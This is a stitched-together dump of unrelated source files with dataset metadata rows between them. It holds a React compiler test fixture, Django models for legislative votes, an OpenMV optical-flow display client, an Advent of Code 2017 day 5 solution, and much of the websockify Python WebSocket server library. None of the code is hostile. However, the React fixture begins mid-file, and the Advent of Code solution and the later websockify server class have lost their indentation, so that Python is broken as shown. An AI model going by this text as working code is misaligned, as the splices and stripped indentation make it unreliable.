return props.bar && getLength();
}
export const FIXTURE_ENTRYPOINT = {
fn: Component,
params: [{bar: null}],
};
```
## Code
```javascript
import { c as _c } from "react/compiler-runtime"; // @enableTreatFunctionDepsAsConditional
function Component(props) {
const $ = _c(5);
let t0;
if ($[0] !== props.bar) {
t0 = function getLength() {
return props.bar.length;
};
$[0] = props.bar;
$[1] = t0;
} else {
t0 = $[1];
}
const getLength = t0;
let t1;
if ($[2] !== getLength || $[3] !== props.bar) {
t1 = props.bar && getLength();
$[2] = getLength;
$[3] = props.bar;
$[4] = t1;
} else {
t1 = $[4];
}
return t1;
}
export const FIXTURE_ENTRYPOINT = {
fn: Component,
params: [{ bar: null }],
};
```
### Eval output
(kind: ok) null | unknown | github | https://github.com/facebook/react | compiler/packages/babel-plugin-react-compiler/src/__tests__/fixtures/compiler/functionexpr–conditional-access.expect.md |
from django.db import models
from djorm_pgarray.fields import ArrayField
from .base import OCDBase, LinkBase, OCDIDField, RelatedBase
from .people_orgs import Organization, Person
from .jurisdiction import LegislativeSession
from .bill import Bill
from .. import common
class VoteEvent(OCDBase):
    """A single vote event (roll call, voice vote, etc.) on a motion."""
    id = OCDIDField(ocd_type='vote')
    # Upstream identifier for the vote, if the source provides one.
    identifier = models.CharField(max_length=300, blank=True)
    # Text of the motion being voted on.
    motion_text = models.TextField()
    # One or more classification strings.
    motion_classification = ArrayField(dbtype="text")  # enum
    # Dates stored as strings to allow varying precision.
    start_date = models.CharField(max_length=19)    # YYYY-MM-DD HH:MM:SS
    end_date = models.CharField(max_length=19, blank=True)    # YYYY-MM-DD
    result = models.CharField(max_length=50, choices=common.VOTE_RESULT_CHOICES)
    organization = models.ForeignKey(Organization, related_name='votes')
    legislative_session = models.ForeignKey(LegislativeSession, related_name='votes')
    # Optional link to the bill the vote concerns.
    bill = models.ForeignKey(Bill, related_name='votes', null=True)

    def __str__(self):
        # Prefer the source identifier; fall back to motion text + bill.
        if self.identifier:
            return '{} in {}'.format(self.identifier, self.legislative_session)
        else:
            return '{} on {}'.format(self.motion_text, self.bill)

    class Meta:
        index_together = [
            ['legislative_session', 'identifier', 'bill'],
            ['legislative_session', 'bill']
        ]
class VoteCount(RelatedBase):
    """Aggregate tally of one option (e.g. yes/no) for a vote event."""
    vote = models.ForeignKey(VoteEvent, related_name='counts')
    option = models.CharField(max_length=50, choices=common.VOTE_OPTION_CHOICES)
    # Number of votes cast for this option.
    value = models.PositiveIntegerField()
class PersonVote(RelatedBase):
    """An individual legislator's vote within a vote event."""
    vote = models.ForeignKey(VoteEvent, related_name='votes')
    option = models.CharField(max_length=50, choices=common.VOTE_OPTION_CHOICES)
    # Name as given by the source; `voter` links to a resolved Person
    # record when one has been matched.
    voter_name = models.CharField(max_length=300)
    voter = models.ForeignKey(Person, related_name='votes', null=True)
    note = models.TextField(blank=True)
class VoteSource(LinkBase):
    """A source URL documenting a vote event."""
    vote_event = models.ForeignKey(VoteEvent, related_name='sources')
#!/usr/bin/env python2
# This file is part of the OpenMV project.
#
# Copyright (c) 2013-2021 Ibrahim Abdelkader <iabdalkader@openmv.io>
# Copyright (c) 2013-2021 Kwabena W. Agyeman <kwagyeman@openmv.io>
#
# This work is licensed under the MIT license, see the file LICENSE for details.
#
# pygame + sockets util that receives optical flow data from the camera and draws a path.
import time
import select
import socket
import pygame
from math import sqrt, isnan
# Drawing colors (RGB).
RED = (255,0,0)
GREEN = (0,255,0)
BLUE = (0,0,255)
WHITE = (255,255,255)
BLACK = (0,0,0)
PINK = (255,200,200)

# Camera's TCP server address -- TODO confirm, hardcoded for a LAN setup.
ADDR =('192.168.1.101', 8080)
WIDTH = 640
HEIGHT = 480

# Accumulated path points drawn as a polyline.
points = []
clock = pygame.time.Clock()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(ADDR)

# Current path position, starting at the window center.
lx = WIDTH//2
ly = HEIGHT//2

while True:
    # Cap the loop at 30 FPS.
    msElapsed = clock.tick(30)
    event = pygame.event.poll()
    if event.type == pygame.QUIT:
        break
    elif event.type == pygame.KEYDOWN:
        if event.key == pygame.K_SPACE:
            # Reset points
            points = []
            lx = WIDTH//2
            ly = HEIGHT//2

    # Expect a comma-separated "dx,dy,response" record from the camera.
    # NOTE(review): recv() may return a partial record; this assumes one
    # complete message per call -- verify against the sender.
    data = s.recv(20)
    print(data)
    dx = float(data.split(',')[0])
    dy = float(data.split(',')[1])
    r = float(data.split(',')[2])

    # Only draw when both displacement components are nonzero and the
    # flow response is strong enough.
    if dx and dy and r > 0.15:
        # Normalize the displacement and take a fixed 5-pixel step.
        m = sqrt(dx*dx + dy*dy)
        x2 = lx + int((dx/m)*5)
        y2 = ly - int((dy/m)*5)
        lx = x2; ly = y2
        points.append((x2, y2))

    if len(points)>1:
        screen.fill(WHITE)
        pygame.draw.lines(screen, RED, False, points, 3)
        pygame.display.update()

s.close()
pygame.quit()
"""
from: http://adventofcode.com/2017/day/5
--- Day 5: A Maze of Twisty Trampolines, All Alike ---
An urgent interrupt arrives from the CPU: it's trapped in a maze of jump instructions, and it would
like assistance from any programs with spare cycles to help find the exit.
The message includes a list of the offsets for each jump. Jumps are relative: -1 moves to the
previous instruction, and 2 skips the next one. Start at the first instruction in the list. The goal
is to follow the jumps until one leads outside the list.
In addition, these instructions are a little strange; after each jump, the offset of that
instruction increases by 1. So, if you come across an offset of 3, you would move three instructions
forward, but change it to a 4 for the next time it is encountered.
For example, consider the following list of jump offsets:
0
3
0
1
-3
Positive jumps ("forward") move downward; negative jumps move upward. For legibility in this
example, these offset values will be written all on one line, with the current instruction marked in
parentheses. The following steps would be taken before an exit is found:
(0) 3 0 1 -3 - before we have taken any steps.
(1) 3 0 1 -3 - jump with offset 0 (that is, don't jump at all). Fortunately, the instruction is
then incremented to 1.
2 (3) 0 1 -3 - step forward because of the instruction we just modified. The first instruction
is incremented again, now to 2.
2 4 0 1 (-3) - jump all the way to the end; leave a 4 behind.
2 (4) 0 1 -2 - go back to where we just were; increment -3 to -2.
2 5 0 1 -2 - jump 4 steps forward, escaping the maze.
In this example, the exit is reached in 5 steps.
How many steps does it take to reach the exit?
"""
def main():
"""Solve the problem!"""
maze = []
jump_count = 0
# import the maze
with open("input.txt") as input_file:
for line in input_file:
maze.append(int(line))
index = 0
while index < len(maze):
jump_value = maze[index]
maze[index] = maze[index] + 1
index = index + jump_value
jump_count = jump_count + 1
print(jump_count)
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
'''
Python WebSocket library with support for "wss://" encryption.
Copyright 2011 Joel Martin
Licensed under LGPL version 3 (see docs/LICENSE.LGPL-3)
Supports following protocol versions:
- http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-07
- http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-10
- http://tools.ietf.org/html/rfc6455
You can make a cert/key with openssl using:
openssl req -new -x509 -days 365 -nodes -out self.pem -keyout self.pem
as taken from http://docs.python.org/dev/library/ssl.html#certificates
'''
import os, sys, time, errno, signal, socket, select, logging
import array, struct
from base64 import b64encode, b64decode

# Imports that vary by python version

# python 3.0 differences
if sys.hexversion > 0x3000000:
    # Python 3: sockets deal in bytes. These helpers convert between
    # bytes and str using latin-1 (a 1:1 byte <-> codepoint mapping).
    b2s = lambda buf: buf.decode('latin_1')
    s2b = lambda s: s.encode('latin_1')
    s2a = lambda s: s
else:
    b2s = lambda buf: buf # No-op
    s2b = lambda s: s # No-op
    s2a = lambda s: [ord(c) for c in s]
try: from io import StringIO
except: from cStringIO import StringIO
try: from http.server import SimpleHTTPRequestHandler
except: from SimpleHTTPServer import SimpleHTTPRequestHandler

# python 2.6 differences
try: from hashlib import sha1
except: from sha import sha as sha1

# python 2.5 differences
try:
    from struct import pack, unpack_from
except:
    from struct import pack
    # Fallback unpack_from for very old Pythons, built on buffer slicing.
    def unpack_from(fmt, buf, offset=0):
        slice = buffer(buf, offset, struct.calcsize(fmt))
        return struct.unpack(fmt, slice)

# Degraded functionality if these imports are missing
for mod, msg in [('numpy', 'HyBi protocol will be slower'),
                 ('ssl', 'TLS/SSL/wss is disabled'),
                 ('multiprocessing', 'Multi-Processing is disabled'),
                 ('resource', 'daemonizing is disabled')]:
    try:
        # Bind the module (or None) as a global so later code can probe
        # availability with e.g. `if numpy:` instead of re-importing.
        globals()[mod] = __import__(mod)
    except ImportError:
        globals()[mod] = None
        print("WARNING: no '%s' module, %s" % (mod, msg))

if multiprocessing and sys.platform == 'win32':
    # make sockets pickle-able/inheritable
    import multiprocessing.reduction
# HTTP handler with WebSocket upgrade support
class WebSocketRequestHandler(SimpleHTTPRequestHandler):
    """
    WebSocket Request Handler Class, derived from SimpleHTTPRequestHandler.
    Must be sub-classed with new_websocket_client method definition.

    The request handler can be configured by setting optional
    attributes on the server object:

    * only_upgrade: If true, SimpleHTTPRequestHandler will not be enabled,
      only websocket is allowed.
    * verbose: If true, verbose logging is activated.
    * daemon: Running as daemon, do not write to console etc
    * record: Record raw frame data as JavaScript array into specified filename
    * run_once: Handle a single request
    * handler_id: A sequence number for this connection, appended to record filename
    """

    # Max bytes read from the socket per recv() call.
    buffer_size = 65536

    # Magic GUID from RFC 6455, appended to the client's key when
    # computing the Sec-WebSocket-Accept hash.
    GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

    server_version = "WebSockify"
    protocol_version = "HTTP/1.1"

    # An exception while the WebSocket client was connected
    class CClose(Exception):
        pass

    def __init__(self, req, addr, server):
        # Retrieve a few configuration variables from the server
        self.only_upgrade = getattr(server, "only_upgrade", False)
        self.verbose = getattr(server, "verbose", False)
        self.daemon = getattr(server, "daemon", False)
        self.record = getattr(server, "record", False)
        self.run_once = getattr(server, "run_once", False)
        self.rec = None
        self.handler_id = getattr(server, "handler_id", False)
        self.file_only = getattr(server, "file_only", False)
        self.traffic = getattr(server, "traffic", False)
        self.logger = getattr(server, "logger", None)
        if self.logger is None:
            self.logger = WebSocketServer.get_logger()
        # Must run last: the base-class constructor handles the request
        # immediately, so all attributes above have to be set first.
        SimpleHTTPRequestHandler.__init__(self, req, addr, server)
@staticmethod
def unmask(buf, hlen, plen):
    """Apply the 4-byte XOR client mask to a frame's payload.

    `buf` is the whole frame; the mask starts at offset `hlen` and the
    masked payload of length `plen` immediately follows it.  Returns the
    unmasked payload bytes.
    """
    pstart = hlen + 4
    pend = pstart + plen
    if numpy:
        # Fast path: XOR in 32-bit chunks with numpy, then handle any
        # 1-3 remaining tail bytes separately.
        b = c = s2b('')
        if plen >= 4:
            mask = numpy.frombuffer(buf, dtype=numpy.dtype('<u4'),
                                    offset=hlen, count=1)
            data = numpy.frombuffer(buf, dtype=numpy.dtype('<u4'),
                                    offset=pstart, count=int(plen / 4))
            #b = numpy.bitwise_xor(data, mask).data
            # NOTE(review): ndarray.tostring() was removed in modern numpy
            # (tobytes() is the replacement) -- confirm the supported range.
            b = numpy.bitwise_xor(data, mask).tostring()
        if plen % 4:
            #self.msg("Partial unmask")
            mask = numpy.frombuffer(buf, dtype=numpy.dtype('B'),
                                    offset=hlen, count=(plen % 4))
            data = numpy.frombuffer(buf, dtype=numpy.dtype('B'),
                                    offset=pend - (plen % 4),
                                    count=(plen % 4))
            c = numpy.bitwise_xor(data, mask).tostring()
        return b + c
    else:
        # Slower fallback: byte-wise XOR using the array module.
        mask = buf[hlen:hlen+4]
        data = array.array('B')
        mask = s2a(mask)
        data.fromstring(buf[pstart:pend])
        for i in range(len(data)):
            data[i] ^= mask[i % 4]
        return data.tostring()
@staticmethod
def encode_hybi(buf, opcode, base64=False):
""" Encode a HyBi style WebSocket frame.
Optional opcode:
0x0 - continuation
0x1 - text frame (base64 encode buf)
0x2 - binary frame (use raw buf)
0x8 - connection close
0x9 - ping
0xA - pong
"""
if base64:
buf = b64encode(buf)
b1 = 0x80 | (opcode & 0x0f) # FIN + opcode
payload_len = len(buf)
if payload_len <= 125:
header = pack('>BB', b1, payload_len)
elif payload_len > 125 and payload_len < 65536:
header = pack('>BBH', b1, 126, payload_len)
elif payload_len >= 65536:
header = pack('>BBQ', b1, 127, payload_len)
#self.msg("Encoded: %s", repr(header + buf))
return header + buf, len(header), 0
@staticmethod
def decode_hybi(buf, base64=False, logger=None):
    """ Decode HyBi style WebSocket packets.
    Returns:
        {'fin'          : 0_or_1,
         'opcode'       : number,
         'masked'       : boolean,
         'hlen'         : header_bytes_number,
         'length'       : payload_bytes_number,
         'payload'      : decoded_buffer,
         'left'         : bytes_left_number,
         'close_code'   : number,
         'close_reason' : string}

    If buf holds only a partial frame, 'payload' stays None and 'left'
    reports how many bytes of buf were not consumed.
    """
    f = {'fin'          : 0,
         'opcode'       : 0,
         'masked'       : False,
         'hlen'         : 2,
         'length'       : 0,
         'payload'      : None,
         'left'         : 0,
         'close_code'   : 1000,
         'close_reason' : ''}

    if logger is None:
        logger = WebSocketServer.get_logger()

    blen = len(buf)
    f['left'] = blen

    if blen < f['hlen']:
        return f # Incomplete frame header

    # Byte 1: FIN flag + opcode; byte 2: mask bit + 7-bit length.
    b1, b2 = unpack_from(">BB", buf)
    f['opcode'] = b1 & 0x0f
    f['fin'] = (b1 & 0x80) >> 7
    f['masked'] = (b2 & 0x80) >> 7

    f['length'] = b2 & 0x7f

    # Lengths 126/127 are escapes for 16-bit / 64-bit extended lengths.
    if f['length'] == 126:
        f['hlen'] = 4
        if blen < f['hlen']:
            return f # Incomplete frame header
        (f['length'],) = unpack_from('>xxH', buf)
    elif f['length'] == 127:
        f['hlen'] = 10
        if blen < f['hlen']:
            return f # Incomplete frame header
        (f['length'],) = unpack_from('>xxQ', buf)

    full_len = f['hlen'] + f['masked'] * 4 + f['length']

    if blen < full_len: # Incomplete frame
        return f # Incomplete frame header

    # Number of bytes that are part of the next frame(s)
    f['left'] = blen - full_len

    # Process 1 frame
    if f['masked']:
        # unmask payload
        f['payload'] = WebSocketRequestHandler.unmask(buf, f['hlen'],
                                                      f['length'])
    else:
        logger.debug("Unmasked frame: %s" % repr(buf))
        f['payload'] = buf[(f['hlen'] + f['masked'] * 4):full_len]

    if base64 and f['opcode'] in [1, 2]:
        try:
            f['payload'] = b64decode(f['payload'])
        except:
            logger.exception("Exception while b64decoding buffer: %s" %
                             (repr(buf)))
            raise

    if f['opcode'] == 0x08:
        # Close frame: optional 2-byte status code + UTF-8 reason text.
        if f['length'] >= 2:
            f['close_code'] = unpack_from(">H", f['payload'])[0]
        if f['length'] > 3:
            f['close_reason'] = f['payload'][2:]

    return f
#
# WebSocketRequestHandler logging/output functions
#

def print_traffic(self, token="."):
    """ Show traffic flow mode. """
    # One character per event; only active when traffic tracing is on.
    if self.traffic:
        sys.stdout.write(token)
        sys.stdout.flush()

def msg(self, msg, *args, **kwargs):
    """ Output message with handler_id prefix. """
    # The handler_id prefix keeps interleaved multi-connection logs readable.
    prefix = "% 3d: " % self.handler_id
    self.logger.log(logging.INFO, "%s%s" % (prefix, msg), *args, **kwargs)

def vmsg(self, msg, *args, **kwargs):
    """ Same as msg() but as debug. """
    prefix = "% 3d: " % self.handler_id
    self.logger.log(logging.DEBUG, "%s%s" % (prefix, msg), *args, **kwargs)

def warn(self, msg, *args, **kwargs):
    """ Same as msg() but as warning. """
    prefix = "% 3d: " % self.handler_id
    self.logger.log(logging.WARN, "%s%s" % (prefix, msg), *args, **kwargs)
#
# Main WebSocketRequestHandler methods
#
def send_frames(self, bufs=None):
    """ Encode and send WebSocket frames. Any frames already
    queued will be sent first. If buf is not set then only queued
    frames will be sent. Returns the number of pending frames that
    could not be fully sent. If returned pending frames is greater
    than 0, then the caller should call again when the socket is
    ready. """
    # Milliseconds since the handshake; used to timestamp recordings.
    tdelta = int(time.time()*1000) - self.start_time
    if bufs:
        for buf in bufs:
            if self.base64:
                encbuf, lenhead, lentail = self.encode_hybi(buf, opcode=1, base64=True)
            else:
                encbuf, lenhead, lentail = self.encode_hybi(buf, opcode=2, base64=False)
            if self.rec:
                # Record only the payload (header/tail stripped).
                self.rec.write("%s,\n" %
                        repr("{%s{" % tdelta
                            + encbuf[lenhead:len(encbuf)-lentail]))
            self.send_parts.append(encbuf)
    while self.send_parts:
        # Send pending frames
        buf = self.send_parts.pop(0)
        sent = self.request.send(buf)
        if sent == len(buf):
            self.print_traffic("<")
        else:
            # Partial send: requeue the unsent remainder and stop; the
            # caller retries once the socket is writable again.
            self.print_traffic("<.")
            self.send_parts.insert(0, buf[sent:])
            break
    return len(self.send_parts)
def recv_frames(self):
    """ Receive and decode WebSocket frames.
    Returns:
        (bufs_list, closed_string)
    """
    closed = False
    bufs = []
    tdelta = int(time.time()*1000) - self.start_time
    buf = self.request.recv(self.buffer_size)
    if len(buf) == 0:
        # Peer disconnected without sending a close frame.
        closed = {'code': 1000, 'reason': "Client closed abruptly"}
        return bufs, closed
    if self.recv_part:
        # Add partially received frames to current read buffer
        buf = self.recv_part + buf
        self.recv_part = None
    while buf:
        frame = self.decode_hybi(buf, base64=self.base64,
                                 logger=self.logger)
        #self.msg("Received buf: %s, frame: %s", repr(buf), frame)
        if frame['payload'] == None:
            # Incomplete/partial frame
            self.print_traffic("}.")
            if frame['left'] > 0:
                # Stash the leftover bytes until the next recv().
                self.recv_part = buf[-frame['left']:]
            break
        else:
            if frame['opcode'] == 0x8: # connection close
                closed = {'code': frame['close_code'],
                          'reason': frame['close_reason']}
                break
        self.print_traffic("}")
        if self.rec:
            start = frame['hlen']
            end = frame['hlen'] + frame['length']
            if frame['masked']:
                recbuf = WebSocketRequestHandler.unmask(buf, frame['hlen'],
                                                        frame['length'])
            else:
                recbuf = buf[frame['hlen']:frame['hlen'] +
                             frame['length']]
            self.rec.write("%s,\n" %
                    repr("}%s}" % tdelta + recbuf))
        bufs.append(frame['payload'])
        if frame['left']:
            # Keep any trailing bytes that belong to the next frame(s).
            buf = buf[-frame['left']:]
        else:
            buf = ''
    return bufs, closed
def send_close(self, code=1000, reason=''):
    """ Send a WebSocket orderly close frame. """
    # Close payload: 2-byte big-endian status code + optional reason text.
    # NOTE(review): struct's "%ds" expects bytes on Python 3 -- 'reason'
    # appears to be a str here; verify on the Python 3 path.
    msg = pack(">H%ds" % len(reason), code, reason)
    buf, h, t = self.encode_hybi(msg, opcode=0x08, base64=False)
    self.request.send(buf)
def do_websocket_handshake(self):
    """Validate the client's upgrade request and send the 101 response.

    Returns True on success (self.version and self.base64 are then set);
    otherwise sends an HTTP error and returns False.
    """
    h = self.headers
    prot = 'WebSocket-Protocol'
    protocols = h.get('Sec-'+prot, h.get(prot, '')).split(',')
    ver = h.get('Sec-WebSocket-Version')
    if ver:
        # HyBi/IETF version of the protocol
        # HyBi-07 report version 7
        # HyBi-08 - HyBi-12 report version 8
        # HyBi-13 reports version 13
        if ver in ['7', '8', '13']:
            self.version = "hybi-%02d" % int(ver)
        else:
            self.send_error(400, "Unsupported protocol version %s" % ver)
            return False
        key = h['Sec-WebSocket-Key']
        # Choose binary if client supports it
        if 'binary' in protocols:
            self.base64 = False
        elif 'base64' in protocols:
            self.base64 = True
        else:
            self.send_error(400, "Client must support 'binary' or 'base64' protocol")
            return False
        # Generate the hash value for the accept header
        # (SHA1 of key + GUID, base64-encoded, per RFC 6455).
        accept = b64encode(sha1(s2b(key + self.GUID)).digest())
        self.send_response(101, "Switching Protocols")
        self.send_header("Upgrade", "websocket")
        self.send_header("Connection", "Upgrade")
        self.send_header("Sec-WebSocket-Accept", b2s(accept))
        if self.base64:
            self.send_header("Sec-WebSocket-Protocol", "base64")
        else:
            self.send_header("Sec-WebSocket-Protocol", "binary")
        self.end_headers()
        return True
    else:
        self.send_error(400, "Missing Sec-WebSocket-Version header. Hixie protocols not supported.")
        return False
def handle_websocket(self):
    """Upgrade a connection to Websocket, if requested. If this succeeds,
    new_websocket_client() will be called. Otherwise, False is returned.
    """
    if (self.headers.get('upgrade') and
        self.headers.get('upgrade').lower() == 'websocket'):
        if not self.do_websocket_handshake():
            return False
        # Indicate to server that a Websocket upgrade was done
        self.server.ws_connection = True
        # Initialize per client settings
        self.send_parts = []
        self.recv_part = None
        self.start_time = int(time.time()*1000)
        # client_address is empty with, say, UNIX domain sockets
        client_addr = ""
        is_ssl = False
        try:
            client_addr = self.client_address[0]
            # A third element in client_address flags an SSL-wrapped
            # socket -- presumably set by the accept path; verify.
            is_ssl = self.client_address[2]
        except IndexError:
            pass
        if is_ssl:
            self.stype = "SSL/TLS (wss://)"
        else:
            self.stype = "Plain non-SSL (ws://)"
        self.log_message("%s: %s WebSocket connection", client_addr,
                         self.stype)
        self.log_message("%s: Version %s, base64: '%s'", client_addr,
                         self.version, self.base64)
        if self.path != '/':
            self.log_message("%s: Path: '%s'", client_addr, self.path)
        if self.record:
            # Record raw frame data as JavaScript array
            fname = "%s.%s" % (self.record,
                               self.handler_id)
            self.log_message("opening record file: %s", fname)
            self.rec = open(fname, 'w+')
            encoding = "binary"
            if self.base64: encoding = "base64"
            self.rec.write("var VNC_frame_encoding = '%s';\n"
                           % encoding)
            self.rec.write("var VNC_frame_data = [\n")
        try:
            self.new_websocket_client()
        except self.CClose:
            # Close the client: echo the requested code and reason.
            _, exc, _ = sys.exc_info()
            self.send_close(exc.args[0], exc.args[1])
        return True
    else:
        return False
def do_GET(self):
    """Handle GET request. Calls handle_websocket(). If unsuccessful,
    and web server is enabled, SimpleHTTPRequestHandler.do_GET will be called."""
    if self.handle_websocket():
        return
    if self.only_upgrade:
        self.send_error(405, "Method Not Allowed")
    else:
        SimpleHTTPRequestHandler.do_GET(self)
def list_directory(self, path):
    """Directory listings are disabled when serving in file-only mode."""
    if not self.file_only:
        return SimpleHTTPRequestHandler.list_directory(self, path)
    self.send_error(404, "No such file")
def new_websocket_client(self):
    """ Do something with a WebSockets client connection. """
    # Abstract hook: subclasses must implement the per-connection protocol.
    raise Exception("WebSocketRequestHandler.new_websocket_client() must be overloaded")
def do_HEAD(self):
    """HEAD is refused in websocket-only mode; otherwise defer to the
    standard file-serving handler."""
    if not self.only_upgrade:
        SimpleHTTPRequestHandler.do_HEAD(self)
    else:
        self.send_error(405, "Method Not Allowed")
def finish(self):
    """Connection teardown hook."""
    # Close out the record file with a valid JS array terminator.
    if self.rec:
        self.rec.write("'EOF'];\n")
        self.rec.close()
def handle(self):
    """Dispatch one request (run_once) or loop like the base handler."""
    # When using run_once, we have a single process, so
    # we cannot loop in BaseHTTPRequestHandler.handle; we
    # must return and handle new connections
    if self.run_once:
        self.handle_one_request()
    else:
        SimpleHTTPRequestHandler.handle(self)
def log_request(self, code='-', size='-'):
    """Log requests only when verbose logging is enabled."""
    if not self.verbose:
        return
    SimpleHTTPRequestHandler.log_request(self, code, size)
class WebSocketServer(object):
    """
    WebSockets server class.
    As an alternative, the standard library SocketServer can be used
    """

    # Flash cross-domain policy document served to Flash-based clients.
    policy_response = """<cross-domain-policy><allow-access-from domain="*" to-ports="*" /></cross-domain-policy>\n"""
    log_prefix = "websocket"

    # An exception before the WebSocket connection was established
    class EClose(Exception):
        pass

    # NOTE(review): appears to request a clean server shutdown -- confirm
    # where it is raised/caught elsewhere in this file.
    class Terminate(Exception):
        pass
def __init__(self, RequestHandlerClass, listen_host='',
listen_port=None, source_is_ipv6=False,
verbose=False, cert='', key='', ssl_only=None,
daemon=False, record='', web='',
file_only=False,
run_once=False, timeout=0, idle_timeout=0, traffic=False,
tcp_keepalive=True, tcp_keepcnt=None, tcp_keepidle=None,
tcp_keepintvl=None):
# settings
self.RequestHandlerClass = RequestHandlerClass
self.verbose = verbose
self.listen_host = listen_host
self.listen_port = listen_port
self.prefer_ipv6 = source_is_ipv6
self.ssl_only = ssl_only
self.daemon = daemon
self.run_once = run_once
self.timeout = timeout
self.idle_timeout = idle_timeout
self.traffic = traffic
self.launch_time = time.time()
self.ws_connection = False
self.handler_id = 1
self.logger = self.get_logger()
self.tcp_keepalive = tcp_keepalive
self.tcp_keepcnt = tcp_keepcnt
self.tcp_keepidle = tcp_keepidle
self.tcp_keepintvl = tcp_keepintvl
# Make paths settings absolute
self.cert = os.path.abspath(cert)
self.key = self.web = self.record = ''
if key:
self.key = os.path.abspath(key)
if web:
self.web = os.path.abspath(web)
if record:
self.record = os.path.abspath(record)
if self.web:
os.chdir(self.web)
self.only_upgrade = not self.web
# Sanity checks
if not ssl and self.ssl_only:
raise Exception("No 'ssl' module and SSL-only specified")
if self.daemon and not resource:
raise Exception("Module 'resource' required to daemonize")
# Show configuration
self.msg("WebSocket server settings:")
self.msg(" - Listen on %s:%s",
self.listen_host, self.listen_port)
self.msg(" - Flash security policy server")
if self.web:
self.msg(" - Web server. Web root: %s", self.web)
if ssl:
if os.path.exists(self.cert):
self.msg(" - SSL/TLS support")
if self.ssl_only:
self.msg(" - Deny non-SSL/TLS connections")
else:
self.msg(" - No SSL/TLS support (no cert file)")
else:
self.msg(" - No SSL/TLS support (no 'ssl' module)")
if self.daemon:
self.msg(" - Backgrounding (daemon)")
if self.record:
self.msg(" - Recording to '%s.*'", self.record)
#
# WebSocketServer static methods
#
@staticmethod
def get_logger():
return logging.getLogger("%s.%s" % (
WebSocketServer.log_prefix,
WebSocketServer.__class__.__name__))
@staticmethod
def socket(host, port=None, connect=False, prefer_ipv6=False,
unix_socket=None, use_ssl=False, tcp_keepalive=True,
tcp_keepcnt=None, tcp_keepidle=None, tcp_keepintvl=None):
""" Resolve a host (and optional port) to an IPv4 or IPv6
address. Create a socket. Bind to it if listen is set,
otherwise connect to it. Return the socket.
"""
flags = 0
if host == '':
host = None
if connect and not (port or unix_socket):
raise Exception("Connect mode requires a port")
if use_ssl and not ssl:
raise Exception("SSL socket requested but Python SSL module not loaded.");
if not connect and use_ssl:
raise Exception("SSL only supported in connect mode (for now)")
if not connect:
flags = flags | socket.AI_PASSIVE
if not unix_socket:
addrs = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM,
socket.IPPROTO_TCP, flags)
if not addrs:
raise Exception("Could not resolve host '%s'" % host)
addrs.sort(key=lambda x: x[0])
if prefer_ipv6:
addrs.reverse()
sock = socket.socket(addrs[0][0], addrs[0][1])
if tcp_keepalive:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if tcp_keepcnt:
sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT,
tcp_keepcnt)
if tcp_keepidle:
sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE,
tcp_keepidle)
if tcp_keepintvl:
sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL,
tcp_keepintvl)
if connect:
sock.connect(addrs[0][4])
if use_ssl:
sock = ssl.wrap_socket(sock)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addrs[0][4])
sock.listen(100)
else:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(unix_socket)
return sock
@staticmethod
def daemonize(keepfd=None, chdir='/'):
os.umask(0)
if chdir:
os.chdir(chdir)
else:
os.chdir('/')
os.setgid(os.getgid()) # relinquish elevations
os.setuid(os.getuid()) # relinquish elevations
# Double fork to daemonize
if os.fork() > 0: os._exit(0) # Parent exits
os.setsid() # Obtain new process group
if os.fork() > 0: os._exit(0) # Parent exits
# Signal handling
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Close open files
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY: maxfd = 256
for fd in reversed(range(maxfd)):
try:
if fd != keepfd:
os.close(fd)
except OSError:
_, exc, _ = sys.exc_info()
if exc.errno != errno.EBADF: raise
# Redirect I/O to /dev/null
os.dup2(os.open(os.devnull, os.O_RDWR), sys.stdin.fileno())
os.dup2(os.open(os.devnull, os.O_RDWR), sys.stdout.fileno())
os.dup2(os.open(os.devnull, os.O_RDWR), sys.stderr.fileno())
def do_handshake(self, sock, address):
"""
do_handshake does the following:
- Peek at the first few bytes from the socket.
- If the connection is Flash policy request then answer it,
close the socket and return.
- If the connection is an HTTPS/SSL/TLS connection then SSL
wrap the socket.
- Read from the (possibly wrapped) socket.
- If we have received a HTTP GET request and the webserver
functionality is enabled, answer it, close the socket and
return.
- Assume we have a WebSockets connection, parse the client
handshake data.
- Send a WebSockets handshake server response.
- Return the socket for this WebSocket client.
"""
ready = select.select([sock], [], [], 3)[0]
if not ready:
raise self.EClose("ignoring socket not ready")
# Peek, but do not read the data so that we have a opportunity
# to SSL wrap the socket first
handshake = sock.recv(1024, socket.MSG_PEEK)
#self.msg("Handshake [%s]" % handshake)
if handshake == "":
raise self.EClose("ignoring empty handshake")
elif handshake.startswith(s2b("<policy-file-request/>")):
# Answer Flash policy request
handshake = sock.recv(1024)
sock.send(s2b(self.policy_response))
raise self.EClose("Sending flash policy response")
elif handshake[0] in ("\x16", "\x80", 22, 128):
# SSL wrap the connection
if not ssl:
raise self.EClose("SSL connection but no 'ssl' module")
if not os.path.exists(self.cert):
raise self.EClose("SSL connection but '%s' not found"
% self.cert)
retsock = None
try:
retsock = ssl.wrap_socket(
sock,
server_side=True,
certfile=self.cert,
keyfile=self.key)
except ssl.SSLError:
_, x, _ = sys.exc_info()
if x.args[0] == ssl.SSL_ERROR_EOF:
if len(x.args) > 1:
raise self.EClose(x.args[1])
else:
raise self.EClose("Got SSL_ERROR_EOF")
else:
raise
elif self.ssl_only:
raise self.EClose("non-SSL connection received but disallowed")
else:
retsock = sock
# If the address is like (host, port), we are extending it
# with a flag indicating SSL. Not many other options
# available...
if len(address) == 2:
address = (address[0], address[1], (retsock != sock))
self.RequestHandlerClass(retsock, address, self)
# Return the WebSockets socket which may be SSL wrapped
return retsock
